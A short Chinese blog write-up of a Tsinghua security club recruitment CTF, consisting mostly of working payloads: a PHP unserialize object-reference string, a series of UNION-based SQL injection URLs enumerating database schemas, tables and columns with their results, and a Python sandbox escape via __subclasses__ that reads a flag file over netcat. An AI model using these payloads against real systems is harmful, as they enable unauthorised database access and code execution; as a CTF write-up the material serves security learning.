[清华网络安全技术协会招新](WEB)
2018-05-17 本文已影响358人
王一航
没什么营养的文章,可以选择忽略不看,同样很久以前的文章了...
http://120.76.114.164:21080/web6/?pass=O%3A7%3A%22justfun%22%3A2%3A%7Bs%3A5%3A%22enter%22%3BN%3Bs%3A6%3A%22secret%22%3BR%3A2%3B%7D
![](https://img.haomeiwen.com/i2355077/2ab1b9ad538e2b82.png)
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(schema_name),%27b%27%20from%20information_schema.schemata%20order%20by%201%20desc%23
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(table_name),%27b%27%20from%20information_schema.tables%20where%20table_schema=%27web%27%20order%20by%201%20desc%23
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27user%27%20order%20by%201%20desc%23
id: id,name,pass
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web1_users%27%20order%20by%201%20desc%23
id: name,pass
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web3_users%27%20order%20by%201%20desc%23
id: id,name
message: b
---
http://120.76.114.164:21080/web4/?_CONFIG=0&kw=%25%27%20union%20select%20group_concat(column_name),%27b%27%20from%20information_schema.columns%20where%20table_name=%27web4_messages%27%20order%20by%201%20desc%23
id: id,message
message: b
![](https://img.haomeiwen.com/i2355077/243d8916b68a96fa.png)
![](https://img.haomeiwen.com/i2355077/739cf2ae3d017584.png)
![](https://img.haomeiwen.com/i2355077/91f31955dc59cd79.png)
![](https://img.haomeiwen.com/i2355077/266efb4222627fa0.png)
![](https://img.haomeiwen.com/i2355077/ca26d3daf3a3ff08.png)
尼玛...四道题居然在同一台服务器上...
感觉整不好可以直接拿到服务器权限啊...
居然存在第二题...
![](https://img.haomeiwen.com/i2355077/ced4500de6b8a7a6.png)
![](https://img.haomeiwen.com/i2355077/1ad3d5d2ff9bc4b6.png)
![](https://img.haomeiwen.com/i2355077/1af3c558e9623110.png)
![](https://img.haomeiwen.com/i2355077/1608172ee0f9b18b.png)
![](https://img.haomeiwen.com/i2355077/c1e0957407a1ff2f.png)
![](https://img.haomeiwen.com/i2355077/042767c8f00cbb0c.png)
![](https://img.haomeiwen.com/i2355077/35ed01a79a0235ec.png)
![](https://img.haomeiwen.com/i2355077/1b15f4600b92c911.png)
![](https://img.haomeiwen.com/i2355077/b048115f1a7b9ba4.png)
~ ›› nc 120.76.114.164 12008
Give me your command!
().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
inp= ().__class__.__bases__[0].__subclasses__()[40]("/home/ctf/flag").read()
Return Value: ctf{pyth0n_1s_als0_unsaf3}